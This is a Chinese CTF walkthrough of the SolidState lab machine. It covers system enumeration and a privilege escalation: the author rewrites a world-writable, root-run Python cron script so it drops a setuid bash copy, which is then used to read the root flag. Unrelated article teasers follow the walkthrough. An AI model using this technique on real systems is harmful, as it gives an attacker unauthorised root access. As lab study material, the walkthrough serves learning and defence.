drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 share

./.local/share:
total 56
drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 .
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 ..
drwx------  2 james osboxes 4096 Jun 18  2017 applications
drwx------  7 james osboxes 4096 Jun 18  2017 evolution
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 folks
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 gnome-settings-daemon
drwx------  2 james osboxes 4096 Jun 18  2017 gnome-shell
drwx------  2 james osboxes 4096 Aug 22  2017 gvfs-metadata
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 icc
drwx------  2 james osboxes 4096 Aug 22  2017 keyrings
drwx------  2 james osboxes 4096 Jun 18  2017 sounds
drwx------  3 james osboxes 4096 Jun 18  2017 telepathy
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 tracker
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 xorg
ls: cannot open directory './.local/share/applications': Permission denied
ls: cannot open directory './.local/share/evolution': Permission denied

./.local/share/folks:
total 8
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 ..
-rw-------  1 james osboxes    0 Aug 22  2017 relationships.ini

./.local/share/gnome-settings-daemon:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 ..
-rw-r--r--  1 james osboxes    0 Jun 18  2017 input-sources-converted
ls: cannot open directory './.local/share/gnome-shell': Permission denied
ls: cannot open directory './.local/share/gvfs-metadata': Permission denied

./.local/share/icc:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 ..
ls: cannot open directory './.local/share/keyrings': Permission denied
ls: cannot open directory './.local/share/sounds': Permission denied
ls: cannot open directory './.local/share/telepathy': Permission denied

./.local/share/tracker:
total 12
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 ..
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 data

./.local/share/tracker/data:
total 220
drwxr-xr-x 2 james osboxes   4096 Aug 22  2017 .
drwxr-xr-x 3 james osboxes   4096 Jun 18  2017 ..
-rw-r----- 1 james osboxes 139096 Aug 22  2017 tracker-store.journal
-rw-r----- 1 james osboxes  74725 Jun 18  2017 tracker-store.ontology.journal

./.local/share/xorg:
total 56
drwxr-xr-x  2 james osboxes  4096 Aug 22  2017 .
drwxr-xr-x 14 james osboxes  4096 Aug 22  2017 ..
-rw-r--r--  1 james osboxes 21679 Aug 22  2017 Xorg.0.log
-rw-r--r--  1 james osboxes 21678 Jun 18  2017 Xorg.0.log.old

./Music:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./.nano:
total 8
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./Pictures:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./Public:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..
ls: cannot open directory './.ssh': Permission denied

./Templates:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./Videos:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$


使用ls -alR  进行递归搜索,但是也没有可用信息!

提权

1、系统信息收集
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ sudo -l
bash: sudo: command not found

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 9.0 (stretch)
Release:        9.0
Codename:       stretch

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )


${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cat /etc/passwd | grep "home" | grep -v nologin
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$


${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls -al /etc/passwd /etc/shadow
-rw-r--r-- 1 root root   2107 Aug 22  2017 /etc/passwd
-rw-r----- 1 root shadow 1375 Aug 22  2017 /etc/shadow
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
/bin/umount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/sbin/pppd
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper


2、恶意脚本提取
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cd opt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -al
total 16
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 Jun 18  2017 ..
drwxr-xr-x 11 root root 4096 Aug 22  2017 james-2.3.2
-rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$


找了一大堆东西,最后我们在opt目录下找到了一个py文件。

看起来是一个 Python 脚本,使用 `os.system` 函数调用 `rm -r /tmp/*` 命令来删除 `/tmp/` 目录下的所有文件和子目录。
如果删除操作失败,脚本将会使用 `sys.exit()` 终止程序。


我们只需要替换脚本需要执行的内容即可!

cp \/bin\/bash \/home\/mindy\/shell;chmod 4777 \/home\/mindy\/shell

不要为了转义。

cp /opt/tmp.py ~/1.py

cat 1.py | sed 's/rm -r \/tmp\/\* /cp \/bin\/bash \/home\/mindy\/shell;chmod 4777 \/home\/mindy\/shell/g' >> 2.py


${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat 2.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('cp /bin/bash /home/mindy/shell;chmod 4777 /home/mindy/shell')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat 2.py > /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('cp /bin/bash /home/mindy/shell;chmod 4777 /home/mindy/shell')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cd mindy/
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -al
total 1272
drwxr-x--- 4 mindy mindy    4096 Dec 17 22:51 .
drwxr-xr-x 4 root  root     4096 Aug 22  2017 ..
-rwxr-xr-x 1 mindy mindy     105 Dec 17 22:38 1.py
-rw-r--r-- 1 mindy mindy     151 Dec 17 22:48 2.py
-rw-r--r-- 1 root  root        0 Aug 22  2017 .bash_history
-rw-r--r-- 1 root  root        0 Aug 22  2017 .bash_logout
-rw-r--r-- 1 root  root      338 Aug 22  2017 .bash_profile
-rw-r--r-- 1 root  root     1001 Aug 22  2017 .bashrc
drwxr-x--- 2 mindy mindy    4096 Aug 22  2017 bin
-rw------- 1 root  root        0 Aug 22  2017 .rhosts
-rwsrwxrwx 1 root  root  1265272 Dec 17 22:51 shell
-rw------- 1 root  root        0 Aug 22  2017 .shosts
drw------- 2 root  root     4096 Aug 22  2017 .ssh
-rw------- 1 mindy mindy      34 Aug 22  2017 user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$


自动执行tmp.py并且成功执行,mindy目录下生成了可执行文件shell。

get root
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./shell -p
shell-4.4# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
shell-4.4# whoami
root
shell-4.4# cd /root
shell-4.4# ls
root.txt
shell-4.4# cat root.txt
b4c9723a28899b1c45db281d99cc87c9
shell-4.4#

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1326024.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

pip的基本命令与使用

一、pip简介 pip是Python的包管理器&#xff0c;类似于其他编程语言中的包管理器&#xff0c;如Ruby的gem或Node.js的npm。它可以帮助你轻松地安装、更新和卸载Python包&#xff08;库或工具&#xff09;。你可以把pip想象成一个应用商店&#xff0c;你可以从中获取你需要的Py…

网络安全:专科及普通本科的温柔乡

当代普通大学生的现状是卷又卷不过、躺又躺不平&#xff0c;把大把的青春都荒废在了思考我应该做什么才能有前途的问题上面。当然&#xff0c;这里说的是那些普通学历且对自己的职业生涯甚至是人生没有规划的大学生&#xff0c;包括专科、普通一本二本&#xff0c;并非985、211…

如何在 JavaScript 中过滤嵌套对象?

概述 在 JavaScript 中&#xff0c;嵌套对象是一个简单的对象&#xff0c;它被括在大括号中&#xff0c;要使嵌套对象成为一个对象&#xff0c;就必须继承它自己的对象。因此&#xff0c;为了在 JavaScript 中过滤对象&#xff0c;JavaScript 提供了名为 "filter() "…

基于CTF探讨Web漏洞的利用与防范

写在前面 Copyright © [2023] [Myon⁶]. All rights reserved. 基于自己之前在CTF中Web方向的学习&#xff0c;总结出与Web相关的漏洞利用方法&#xff0c;主要包括&#xff1a;密码爆破、文件上传、SQL注入、PHP伪协议、反序列化漏洞、命令执行漏洞、文件包含漏洞、Vim…

Switch Transformers 的模型架构

Switch Transformers 的模型架构主要由以下几个部分组成&#xff1a; **专家&#xff1a;**Switch Transformers 由多个专家组成&#xff0c;每个专家都具有独立的参数。专家的数量可以根据需要进行调整。 **路由器&#xff1a;**路由器负责根据输入选择合适的专家。路由器可…

vue2 按钮限制 点击按钮一前 灰色不可以点击 点击按钮一后 可以点击

代码 <template> <div> <button click"enableButtons">按钮1</button> <button :disabled"!isButton2Enabled" click"ann">按钮2</button> <button :disabled"!isButton3Enabled" c…

hive企业级调优策略之数据倾斜

测试所用到的数据参考&#xff1a; 原文链接&#xff1a;https://blog.csdn.net/m0_52606060/article/details/135080511 本教程的计算环境为Hive on MR。计算资源的调整主要包括Yarn和MR。 数据倾斜概述 数据倾斜问题&#xff0c;通常是指参与计算的数据分布不均&#xff0…

MySQL-3

复习 DML操纵数据语句更新&#xff1a;insert/update/delete查询&#xff1a;select select 列1 as 别名,列2 as 别名 from 表名 as 对表取别名 where 对行的筛选 group by 分组的列名 having 配合统计函数进行对组的筛选 order by 排序的列 asc/desc limit 偏移量,获得条数 嵌…

route 路由使用记录

一、路由的基本介绍 路由是计算机网络中的一个重要概念&#xff0c;它用于确定数据包从源地址到目的地址的路径。在网络中&#xff0c;路由器是负责转发数据包的设备。 下面是关于路由的基本知识和使用方法的介绍&#xff1a; 路由表&#xff1a;路由器通过路由表来确定数据包…

配置自定义RedisTemplate 解决redis序列化java8 LocalDateTime

目录 配置自定义RedisTemplate 引入依赖 配置连接redis 编写测试类 出现问题 配置序列化 解决redis序列化java8 LocalDateTime 问题背景 问题描述 问题分析 解决方案一&#xff08;全局&#xff09; 解决方案二&#xff08;单个字段&#xff09; 配置自定义RedisTe…

某电子文档安全管理系统存在任意用户登录漏洞

漏洞简介 某电子文档安全管理系统存在任意用户登录漏洞&#xff0c;攻击者可以通过用户名获取对应的cookie&#xff0c;登录后台。 资产测绘 Hunter语法&#xff1a;web.icon“9fd216c3e694850445607451fe3b3568” 漏洞复现 获取Cookie POST /CDGServer3/LinkFilterServi…

MySQL 8.0 InnoDB Tablespaces之File-per-table tablespaces(单独表空间)

文章目录 MySQL 8.0 InnoDB Tablespaces之File-per-table tablespaces&#xff08;单独表空间&#xff09;File-per-table tablespaces&#xff08;单独表空间&#xff09;相关变量&#xff1a;innodb_file_per_table使用TABLESPACE子句指定表空间变量innodb_file_per_table设置…

ESD静电的危害与失效类型及模式?|深圳比创达电子

一、ESD的危害 1、失效的电子设备有60%~75%都是由ESD造成的&#xff1b; 2、对于新兴技术行业&#xff0c;尤其是高科技微电子&#xff0c;半导体&#xff0c;电磁敏感类及光器件的应用&#xff0c;比例将上升到90%。 因静电原因造成的电子行业的损失每年都多达几百亿美元&am…

JavaWeb笔记之前端开发HTML

一、引言 1.1HTML概念 网页&#xff0c;是网站中的一个页面&#xff0c;通常是网页是构成网站的基本元素&#xff0c;是承载各种网站应用的平台。通俗的说&#xff0c;网站就是由网页组成的。通常我们看到的网页都是以htm或html后缀结尾的文件&#xff0c;俗称 HTML文件。 …

【SpringCloud】设计原则之CAP与EDA事件驱动

一、设计原则之CAP CAP 原则又称 CAP 定理&#xff0c;指的是在一个分布式系统中&#xff0c;Consistency&#xff08;一致性&#xff09;、Availability&#xff08;可用性&#xff09;和 Partition tolerance&#xff08;分区容错性&#xff09;&#xff0c;三者不可兼得&…

美颜技术详解:深入了解视频美颜SDK的工作机制

本文将深入探讨视频美颜SDK的工作机制&#xff0c;揭示其背后的科技奥秘和算法原理。 1.引言 视频美颜SDK作为一种集成到应用程序中的技术工具&#xff0c;通过先进的算法和图像处理技术&#xff0c;为用户提供令人印象深刻的实时美颜效果。 2.视频美颜SDK的基本工作原理 首…

C#上位机与欧姆龙PLC的通信04---- 欧姆龙plc的存储区

1、存储区概念 欧姆龙PLC将整个数据存储器分为10个区&#xff1a;输入继电器区、输出继电器区、内部辅助继电器区、特殊继电器区、保持继电器区、暂存继电器区、定时/计数器区、数据存储区、辅助存储继电器区、链接继电器区。 输入输出继电器区 CP1E系列PLC输入继电器区有16…

Modbus-ASCII数据帧

Modbus-ASCIl传输模式中&#xff0c;每个字节均以ASCI编码&#xff0c;实际报文中1个字节会以两ASCIl字符发送&#xff0c;因此这种模式比Modbus-RTU模式效率要低。 例如报文数据 x5B "5""B" X35 X42 . 数据帧格式如下: 从ASCI报文帧可以看出&#xff0…

探索 Vue3 (四) keep-alive缓存组件

keep-alive 的作用 官网介绍&#xff1a;KeepAlive | Vue.js keep-alive为抽象组件&#xff0c;主要用于缓存内部组件数据状态。可以将组件缓存起来并在需要时重新使用&#xff0c;而不是每次重新创建。这可以提高应用的性能和用户体验&#xff0c;特别是在需要频繁切换组件时…